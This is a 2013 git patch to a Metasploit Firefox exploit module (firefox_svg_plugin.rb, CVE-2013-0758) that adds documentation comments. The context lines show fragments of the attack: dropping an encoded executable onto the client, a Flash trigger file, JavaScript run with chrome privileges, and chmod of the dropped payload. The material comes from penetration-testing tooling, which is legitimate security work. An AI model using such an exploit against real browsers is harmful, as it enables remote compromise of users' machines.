From eaeb10742af2837b2384ad89e69f50e27bb38915 Mon Sep 17 00:00:00 2001
From: Joe Vennix <Joe_Vennix@rapid7.com>
Date: Tue, 21 May 2013 14:00:45 -0500
Subject: [PATCH] Add some comments and clean some things up.

---
 modules/exploits/multi/browser/firefox_svg_plugin.rb | 9 +++++++++
 1 file changed, 9 insertions(+)

diff --git a/modules/exploits/multi/browser/firefox_svg_plugin.rb b/modules/exploits/multi/browser/firefox_svg_plugin.rb
index 7d6917daf0..5246191f39 100644
--- a/modules/exploits/multi/browser/firefox_svg_plugin.rb
+++ b/modules/exploits/multi/browser/firefox_svg_plugin.rb
@@ -100,10 +100,12 @@ class Metasploit3 < Msf::Exploit::Remote
 		handler(cli)
 	end
 
+	# @return [String] the encoded executable for dropping onto the client's machine
 	def dropped_file_contents(cli)
 		regenerate_payload(cli).encoded_exe()
 	end
 
+	# @return [Msf::Module::Target] that matches the client's user-agent header
 	def get_target(agent)
 		# browser detection
 		if agent !~ /firefox/i
@@ -124,11 +126,13 @@ class Metasploit3 < Msf::Exploit::Remote
 		end
 	end
 
+	# @return [String] the contents of the .swf file used to trigger the exploit
 	def flash_trigger
 		swf_path = File.join(Msf::Config.install_root, "data", "exploits", "cve-2013-0758.swf")
 		@flash_trigger ||= File.read(swf_path)
 	end
 
+	# @return [String] the filename that will be used when the payload is dropped 
 	def payload_filename
 		if target.name == 'Windows x86 (Native Payload)'
 			"#{Rex::Text.rand_text_alphanumeric(8)}.exe"
@@ -137,6 +141,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		end
 	end
 
+	# @return [String] containing javascript code to execute with chrome privileges
 	def js_payload
 		%Q|
 		#{js_debug("Injection successful. JS executing with chrome privileges.")}
@@ -167,10 +172,13 @@ class Metasploit3 < Msf::Exploit::Remote
 		|
 	end
 
+	# @return [String] containing javascript that will alert a debug string
+	#   if the DEBUG is set to true
 	def js_debug(str, quote="'")
 		if datastore['DEBUG'] then "alert(#{quote}#{str}#{quote})" else '' end
 	end
 
+	# @return [String] containing javascript that will chmod the dropped executable
 	def chmod_code
 		return '' if target.name == 'Windows x86 (Native Payload)'
 		%Q|
@@ -189,6 +197,7 @@ class Metasploit3 < Msf::Exploit::Remote
 		"#{proto}://#{myhost}:#{datastore['SRVPORT']}#{datastore['URIPATH']}"
 	end
 
+	# @return [String] HTML that is sent in the first response to the client
 	def generate_html
 		vars = {
 			:symbol_id        => 'a',